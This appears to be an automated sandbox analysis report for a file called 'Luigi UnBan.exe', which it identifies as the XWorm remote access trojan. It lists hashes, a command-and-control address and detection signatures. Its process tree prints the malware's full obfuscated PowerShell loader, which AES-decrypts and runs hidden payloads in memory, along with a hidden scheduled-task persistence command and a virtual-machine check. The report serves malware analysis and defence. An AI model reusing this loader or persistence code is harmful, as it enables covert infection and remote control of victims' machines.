Overview

overview

10

Static

static

3

Luigi UnBan.exe

windows11-21h2-x64

10

Luigi UnBan.exe

android-11-x64

Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    12-11-2024 05:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Luigi UnBan.exe

  • Size

    178.2MB

  • MD5

    fdaf5b201a0e1c706e755cf2dcf6adb4

  • SHA1

    015461363ad9a3897d2ea5deda2fa44fe57756f3

  • SHA256

    0f3a0a876e198379b45b75a0c06ee8f3cab91eb26fd868fab769ed72b804f600

  • SHA512

    cc0e9a65170e318a4faad0a28aa7458dc0367027b7419049b0dce2baa1df535e7f776395b904be8466b055b1a40a97317cead9adb96afde637e82343f4d1ba91

  • SSDEEP

    1572864:3gm3YzFXmdksvLt/u5ZnKBE5MoDNU0gj67dnHE7:3gm3YYdkqZu6E5Mg7dK

Score
10/10
xwormexecutionrattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

80.76.49.227:9999

Mutex

g0vzRORqzebeaKQj

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Luigi UnBan.exe
    "C:\Users\Admin\AppData\Local\Temp\Luigi UnBan.exe"
    1⤵
    • Enumerates system info in registry
    • Suspicious use of WriteProcessMemory
    PID:2940
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\Win32Temp.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2052
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic diskdrive get Model
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1420
      • C:\Windows\system32\findstr.exe
        findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
        3⤵
          PID:1988
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\Win64Temp.bat"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4988
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4pr42IAhLNXaMsLDATuTCXnSN37MkzjWlGCxvlpI204='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mUAA0rhmn7r0Y49Br4h9Tg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NWFXD=New-Object System.IO.MemoryStream(,$param_var); $TWFke=New-Object System.IO.MemoryStream; $XkRIU=New-Object System.IO.Compression.GZipStream($NWFXD, [IO.Compression.CompressionMode]::Decompress); $XkRIU.CopyTo($TWFke); $XkRIU.Dispose(); $NWFXD.Dispose(); $TWFke.Dispose(); $TWFke.ToArray();}function execute_function($param_var,$param2_var){ $SgoJi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $obVxl=$SgoJi.EntryPoint; $obVxl.Invoke($null, $param2_var);}$HAian = 'C:\Users\Admin\AppData\Local\Temp\Win64Temp.bat';$host.UI.RawUI.WindowTitle = $HAian;$jwIhR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HAian).Split([Environment]::NewLine);foreach ($fbsbe in $jwIhR) { if ($fbsbe.StartsWith(':: ')) { $Eaalc=$fbsbe.Substring(3); break; }}$payloads_var=[string[]]$Eaalc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4760
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_190_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_190.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4012
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_190.vbs"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4868
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_190.bat" "
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3908
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4pr42IAhLNXaMsLDATuTCXnSN37MkzjWlGCxvlpI204='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mUAA0rhmn7r0Y49Br4h9Tg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NWFXD=New-Object System.IO.MemoryStream(,$param_var); $TWFke=New-Object System.IO.MemoryStream; $XkRIU=New-Object System.IO.Compression.GZipStream($NWFXD, [IO.Compression.CompressionMode]::Decompress); $XkRIU.CopyTo($TWFke); $XkRIU.Dispose(); $NWFXD.Dispose(); $TWFke.Dispose(); $TWFke.ToArray();}function execute_function($param_var,$param2_var){ $SgoJi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $obVxl=$SgoJi.EntryPoint; $obVxl.Invoke($null, $param2_var);}$HAian = 'C:\Users\Admin\AppData\Roaming\startup_str_190.bat';$host.UI.RawUI.WindowTitle = $HAian;$jwIhR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HAian).Split([Environment]::NewLine);foreach ($fbsbe in $jwIhR) { if ($fbsbe.StartsWith(':: ')) { $Eaalc=$fbsbe.Substring(3); break; }}$payloads_var=[string[]]$Eaalc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:4700

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      3KB

      MD5

      df472dcddb36aa24247f8c8d8a517bd7

      SHA1

      6f54967355e507294cbc86662a6fbeedac9d7030

      SHA256

      e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

      SHA512

      06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      4fc204cd72f2c3f6149d487b16ea4a83

      SHA1

      ac5f7fae2c1ac704ad559069589844a89c0b7410

      SHA256

      dc706e6f21d6e4b670e36f3ed9772fef5f47d30af28f587f14ccd2f6348d14d8

      SHA512

      d6e90367ab4efcc2364ac7ad18763ba79b3f5ac638cefd1ec651bee9e9b6d3753b24e41bf774ce400024f1befd3b33e33fc89f0ec836e8e8256a39719a303ac4

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Win32Temp.bat
      Filesize

      7.0MB

      MD5

      0e7be50d14359ee381e440f14a9b4ddf

      SHA1

      b3c849e1157eba02e7f0403655db4851623a6f10

      SHA256

      2d008467a42b452490542f14ce735f0a628a64f3e75d86698d8a8da86d0580bd

      SHA512

      0e7e5e81e300b544587d7662b4135600673f4230658a7a81e9a295276aa7c4f0cbfc8c75df212616355bc460592373f4d4a7f6d1dc3b7a0594c60e7f5c98f87c

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Win64Temp.bat
      Filesize

      478KB

      MD5

      09c4764995d1f2e96d0a228743f2425e

      SHA1

      0a755c43e147141ec0e9d96d243765af66d1e8a0

      SHA256

      c4db1679718dfb67fb33fcedced456035056f41b68fc071379d27d8bd708e6ab

      SHA512

      856759d72b6fff895d336acb8f86ac82ad8560f5229c1cd12baf25bf6ea9ee80035d364c69c00e66bbe9678f788a635f837032a92d3f08008a8343dcc992ff6e

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hdireryp.ki2.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Roaming\startup_str_190.vbs
      Filesize

      115B

      MD5

      3b489b2229450cee95349b6f214b4833

      SHA1

      19d555fb744edf5292b10865c0c0a9b0edf2b6c6

      SHA256

      1ca00d9e17ab12c0c7e76d445ba93c5a313f438820bea2ab5964fdab2576aef7

      SHA512

      c6891efa85a73bd86f2925e714f80276cffe127e5983c36b2d8ad54945ae9c9ca3e5ee5e4609c9c1b478abb4b6f8f8618c1302967e08f2a975f5a64b68169f05

      Download Submit

    • memory/4700-51-0x00000204AFBB0000-0x00000204AFBBE000-memory.dmp

      Filesize

      56KB

      Download

    • memory/4760-12-0x00000209DD9A0000-0x00000209DD9C2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4760-21-0x00000209DDC40000-0x00000209DDC48000-memory.dmp

      Filesize

      32KB

      Download

    • memory/4760-22-0x00000209DDC70000-0x00000209DDCA2000-memory.dmp

      Filesize

      200KB

      Download